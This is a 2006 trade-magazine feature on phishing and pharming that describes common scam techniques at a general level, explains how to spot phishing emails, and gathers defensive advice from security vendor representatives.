Convergence Plus Logo


www Convergence Plus
 
Sections Online
Telecommunications
Mobility
Information Technology
InfoSecurity

InfoSecurity

December 18, 2006
 Phishing for Security

Runa Mukherjee

     
 

The technical definition of phishing means the act of sending e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit cards, social security, and bank account numbers, that the legitimate organisation already has. The web site, however, is bogus and set up only to steal the user’s information. These days, there are scams that say money is waiting to be picked up. Of course, prizes, vacations, electronic goods or money have been used for a long time to lure Internet users into visiting certain websites or enrolling for various programs. But now phishing for real bank account numbers and personal information is also a reality. Check out the big picture!.

  

NEW DELHI -- Phishing is essentially an online con game, and phishers are nothing more than tech-savvy con artists and identity thieves. They use spam, fake websites, crimeware and other techniques to trick people into divulging sensitive information, such as bank and credit card account details. Once they have captured enough victims’ information, they either use the stolen goods themselves to defraud the victims (by opening up new accounts using the victim’s name or draining the victim’s bank accounts) or they sell it on the black market for a profit.

The word phishing comes from the analogy that Internet scammers are using e-mail lures to fish for passwords and financial data from the sea of Internet users. The term was coined in 1996 by hackers who were stealing AOL Internet accounts by scamming passwords from unsuspecting AOL users. Since hackers have a tendency to replace "f" with "ph", the term phishing was derived.

In most cases, phishers send out a wave of spam e-mail, sometimes up to millions of messages. Each e-mail contains a message that appears to come from a well-known and trusted company. Usually the message includes the company's logo and name, and it often tries to evoke an emotional response to a false crisis. Couched in urgent, business-like language, the e-mail often makes a request of the user’s personal information. Sometimes the e-mail directs the recipient to a spoofed website. The website, like the e-mail, appears authentic and in some instances its URL has been masked so the web address looks real.

The bogus website urges the visitor to provide confidential information — social security numbers, account numbers, passwords and the likes. Since the e-mail and corresponding website seem legitimate, the phisher hopes at least a fraction of recipients are fooled into submitting their data.

“While it is impossible to know the actual victim response rates to all phishing attacks, it is commonly believed that about 1 to 10 percent of recipients are duped with a 'successful' phisher campaign having a response rate of around five percent. To put this in perspective, spam campaigns typically have a less than 1 percent response rate,” said Kartik Shahani, director, sales –McAfee, India and SAARC.

Phishing Techniques

Well, other than using fraudulent URL, the fraudsters use different techniques to extract information from their target:

  • Man-in-the-middle - In this technique, the fraudster is located between the victim and the real website, acting as a proxy server. By doing so, he can listen to all communication between them. In order to be successful, fraudsters must be able to redirect victims to their own proxy, instead of to the real server. There are several methods, such as transparent proxies, DNS Cache Poisoning and URL obfuscation.
  • Exploitation of Cross-Site Scripting vulnerabilities in a website - This allows a secure banking web page to be simulated, without users detecting any anomalies, neither in the web address nor in the security certificate displayed in the web browser.
  • Vulnerabilities in Internet Explorer - Which by means of an exploit, allows the web address that appears in the browser address bar to be spoofed. By doing so, while the web browser could be redirected to a fraudulent website, the address bar would display the trustworthy website URL. This technique also allows false pop-up windows to be opened when accessing legitimate websites.
Some attacks also use exploits hosted in malicious websites, which exploit vulnerabilities in Internet Explorer or the client operating system in order to download key logger type trojans, which will steal confidential user information.

Deception Methods

  • E-mail Methods - The initial phishing e-mail is designed to entice the recipient to open the e-mail and click on the link provided. The fraudsters use multiple methods to do this, including enticing subject lines, forging the address of the sender, using genuine looking images and text and disguising the links within the e-mail.
  • Deceptive Subject Lines - Phishing e-mails tend to have subject lines that appear to be genuinely related to who the e-mail is from, in an attempt to entice the user to open the e-mail. For example, subject lines such as “Important notice for all Internet Banking Users”. It is also common for subject lines to carry numerals or other letters to replace characters, in an attempt to bypass SPAM filters, such as capital “I” replacing “l”. Some phishing e-mails will deliberately misspell key words to bypass SPAM filters, which most people would not recognise when quickly glancing at the subject line.
  • Forged Senders Address - The forging of the senders address is an easy deception method. There is no guarantee that the address listed as the senders address is genuine. Phishing scam e-mails will normally have a forged senders address appearing as though the e-mail has come from the company it is claiming to be.
  • Genuine Looking Content - Phishing e-mails normally utilise copied images and text styles used on the legitimate web site to portray their e-mail as genuine. Many consumers are fooled into thinking an e-mail is genuine simply because it had the banks logo within the e-mail. Some phishing e-mails also have genuine links to the company's privacy policy and other pages on the legitimate web site. Trusts and authentication marks are also duplicated to build the user's confidence in the authentication of the e-mail.
  • Disguised Hyperlinks - Links within an e-mail are deliberately disguised in another attempt to deceive the recipient. HTML e-mails may display a genuine URL but when clicked on the hyperlink will take the user to a different web site. For example: a link displayed as “http://www.genuine-site.com” may actually take the user to “http://www.fraud-site.com”
  • E-mail Form - The e-mail contains a form for the consumer to enter their personal information and click 'submit', 'send' or 'update'. Forms within e-mails utilise script located on a remote server to receive the information and either forward the information to the fraudsters, or place the information in a database for the fraudster to pick up later.
  • Bank account Scams - The new scheme starts with an e-mail from a phony bank, claiming that a large amount of money has been placed into a new account opened in the recipient's name. A link to the bogus bank is included, along with an account number and a PIN code.

    Next, the message explains how the user can transfer the money by logging into this account, where a large sum of money is supposed to be. However in order for the transaction to take place, one must submit their personal information and valid bank account, which will later be cleared.
  • HTML form embedded in the e-mail - Another method used by phishers is an HTML form embedded in the e-mail. In this method, the legitimate looking e-mail includes a form right in the e-mail to input your important information. This method is particularly dangerous, as an HTML form in an e-mail can do any number of things, including automatically sending all the data entered to a phishing site or e-mail address owned by phishers.
  • Pop-up Windows - One other trick utilised by phishers is using pop-up windows to give the appearance of legitimacy. The actual bank's website will be opened in the background and the phishing site will be opened as a popup window. The pop-up looks like it's part of the legitimate site and it usually does not include an address bar, so it doesn't have to spoof the URL.
One finds it very difficult to identify a phishy mail to an authentic one. As Vishak Raman, country manager, India, Fortinet Inc, puts it, “It’s not very easy to identify a legitimate e-mail and a phishing e-mail and it’s even more difficult when the e-mails are from those that are clients of the financial entity from which the e-mail message is supposed to come from.”

“Hoax e-mails are specially created to imitate legitimate ones. They are well written, business – oriented e-mails from an apparently trusted source. These e-mails carry off the deception so well that recipients can’t really differentiate them from genuine mails. Only extremely careful inspection will help one discern between a genuine e-mail and a fraudulent one. In a phishing attack, a fake, but similar Web page or e-mail of a bank or shopping portal pops up on a user’s computer screen. This fake e-mail or website asks the user to revalidate confidential information. Busy e-mail users who receive phished mails are otherwise unaware of phishing often take advantage of the seemingly convenient method of updating their account online and thus provide private information directly to the intruder,” said Shubhomoy Biswas, country manager, SonicWALL India.

Identifying a Phishing Scam

  • Unsolicited E-mails : Many phishing e-mails begin with a general greeting, such as “Dear Client.” If your first and last names are not displayed, be suspicious and do not click on any links or buttons.
  • False Warnings : Messages may imply a sense of urgency or immediate risk to bank accounts or credit cards if you fail to answer. For example, they may state that an unauthorised transaction has recently occurred on your account, or claim that BMO Financial Group is updating its records/services and requires information immediately to ensure continued access to your holdings.
  • Phishing e-mails often contain misspellings, incorrect grammar, or missing words. They even contain attachments or links to fraudulent sites that are designed to mimic the look and feel of a genuine site. The web address of the site will often have the @ symbol or a numeric address (e.g. 123.456.1.2). The message may conclude with: "Once logged in to your account, you can transfer via wire directly to your personal bank account by clicking on the 'click here to transfer' link”.

“Now we know the reason why this malware threat exists: it is quite cheap to launch a phishing attack, and the benefits obtained are high, even with the smallest success rate,” said Raman.

Pharming

Pharming is a much more sophisticated technique. It consists in modifying the contents of the DNS (Domain Name Server), either via the TCP/IP protocol settings or the lM host file, which acts as a local cache of server names in order to redirect web browsers to forged websites instead of the legitimate ones, when the user attempts to access them. Furthermore, if the victim uses a proxy in order to remain anonymous while surfing the web, its DNS name resolution could also become affected, so that all the proxy users are redirected to the false server. This can be another technique used by “phishers”.

“This is a more advanced attack where either the users HOSTS file is modified locally to override DNS requests or when a DNS server is compromised to give out false information. The difference compared to phishing is that the domain name seen in the web browser will be the same as the real one,” said Patrick Runald, senior security specialist, F-Secure Security Labs.

On the same lines, explained Mohammed Hayath, national business development manager, India, (Network Security), Cisco: “Pharming also takes advantage of false Websites, but redirects users to the false site as they attempt to access a legitimate website. This redirection, also known as domain spoofing, can be perpetrated through an e-mailed virus that lies dormant on a PC until the user enters a specific URL, or by poisoning a domain name system (DNS) directory. A DNS translates Web and e-mail addresses into numeric strings. In a poisoned DNS, the links that associate Web addresses with numeric strings are changed so users are directed to a false website when they enter a specific URL. Any secure information entered into the false Website, such as a user name and password, is captured by hackers.”

To combat Phishing

SonicWall's Bose recommends four steps to stop attacks in the network include : Detect, Protect, Align, Inform;

  • Detect: Use analysis techniques specifically designed to detect fraud. Spam filters, which are specifically designed to let legitimate e-mail into your corporate network, will not stop fraudulent e-mail that looks identical to the real thing. An effective anti-fraud solution must be able analyse a variety of message attributes that set fraudulent e-mail apart from spam and legitimate e-mail and make definitive judgments about authenticity.
  • Protect: Develop containment and control protocols specifically for fraudulent e-mail as it isnt spam. It should not be placed into quarantine with spam and allowed into your corporate network where your employees might remove it from quarantine and act on it. An effective anti-spam solution must be able to segregate fraudulent e-mails immediately from other types of unwanted e-mail and offer your IT department the option of deleting them at the perimeter of your network, before they have a chance to reach any recipient.
  • Align: Make your anti-fraud solution a part of an overall e-mail security solution. Your anti-fraud solution should not stand alone. An effective anti-fraud solution should offer a number of options that align with other corporate security processes. Your legal department may want a paper trail of all attempted fraud attacks, while corporate security may want alerts about new types of fraud as they emerge. Your anti-fraud solution also should be linked into a greater network of security entities outside your business that send out regular alerts about emerging fraud techniques, giving your IT department the best possible information and the longest possible lead time to build new defenses before a new fraud outbreak hits you.
  • Inform: Increase awareness and communication about e-mail fraud throughout your organisation as the more your employees know about how they are being targeted and what they should do when they suspect e-mail fraud, the more likely they are to take appropriate action when actually hit by fraud. An effective anti-fraud solution needs distinct fraud reporting, alert and feedback tools, so that administrators can be kept aware of trends, make necessary modifications at the network level and report those findings back to other entities that are part of your security network both inside and outside your organisation. Alerts should be educational, instructional and should heighten awareness and caution. Encourage your employees to report fraud or suspected fraud. The more you know, the better prepared you can be.

Anti-phishing software is available that may identify phishing contents on websites, act as a toolbar that displays the real domain name for the visited website, or spot phishing attempts in e-mail. Microsoft's new IE7 browser, Mozilla's Firefox 2, and Opera from version 9.1 will include a form of anti-phishing technology, by which a site may be checked against a list of known phishing sites. If the site is a suspect, the software may either warn a user or block the site outright. Firefox 2 uses Google anti-phishing software, which may also be installed under IE6.

Spam filters also help protect users from phishers, because they reduce the number of phishing-related e-mails that users receive. An approach introduced in mid-2006 (similar in principle to using a hosts file to block web adverts) involves switching to using a special DNS service that filters out known phishing domains, which will work with any browser.

“Nowadays, sites have added verification tools that allow users to see a secret image that the user selected in advance; if the image does not appear, then the site is not legitimate. Bank of America uses this together with challenge questions, which ask the user for information that should be known only to the user and the bank. This feature (and other forms of two-way authentication and two-factor authentication) is still susceptible to attack, such as that suffered by Scandinavian bank Nordea in late 2005,” said Kartik Shahani, McAfee.

The McAfee SiteAdvisor, available as a free tool, has pioneered web safety by testing more than 95 percent of the trafficked web for spyware, adware, spam, browser attacks and online scams. These test results are used to develop site ratings which are communicated to end-users via intuitive red, yellow and green icons. More than 250 million times each day, consumers use these ratings to advise them about which sites are safe and which are not.

Runald of F-Secure believes it is the home users that have to be aware. “Home users are the biggest target for phishing attacks as they are, from the attackers point of view, easier to fool into parting with their credentials. Online banking is still safe as long as the users are aware and cautious when they’re online. They also have to run an update-to-date antivirus product, up-to-date spyware product and a firewall. The best and easiest way is to buy an Internet Security Suite that will protect against all of these types of attacks,” he said.

Conclusion

We see that phishing is a big threat to the security aspect of almost all the sectors. In fact, even home users are not safe. However, the good news is, that most of the anti-phishing tools are efficient, cost effective and reliable. The installations are one time investments and then rest is assured. And definitely this investment is worth the kind of security it provides.

“Usually anti-phishing technology is included in the Internet Security Suites that are available from different vendors, including our own F-Secure Internet Security 2007 product,” said Runald.

Vishak Raman of Fortinet believes self-awareness is primary. “The best way to stop yourself from being Phished is to be well informed, organisations should take special care in educating it’s employees about such threats, by verifying the information source and checking with the company if they have sent you any such e-mail before replying to any of such mails,” he said.

Reinforcing your security has become as important as the transaction itself. Users making transactions through the Internet should install security suites that block this kind of threat on their computers, apply the latest security patches available through their usual vendors and make sure that they are operating in secure mode using digital certificates or communication protocols such as HTTPS.

At the end of the day, it is the information that matters to the organisations and they must ensure its safety. Phishing is a threat, but anti-phishing methods are not only easily available but also cost efficient and reliable. Its better to swim away from such info-security threats by acting in time, or you can simply take the bait offered by these 'phishers' and lose the most essential ingredient of a successful unit, the data.
 
Samples of Phishy E-mails
  
 





 








Mohammed Hayath, National Business Development Manager, India, (Network Security), Cisco


Kartik Shahani, Director, Sales – McAfee, India & SAARC


Patrick Runald, Senior Security Specialist, F-Secure Security Labs


Vishak Raman, Country Manager, India, Fortinet Inc.
Disclaimer: No content may be used from this site without the written permission of the authors, Convergence Plus, Comnet Publishers Pvt. Ltd. and Exhibitions India Pvt. Ltd. The views expressed on this site are solely those of the authors and do not reflect those of Convergence Plus, Comnet Publishers Pvt. Ltd. and Exhibitions India Pvt. Ltd.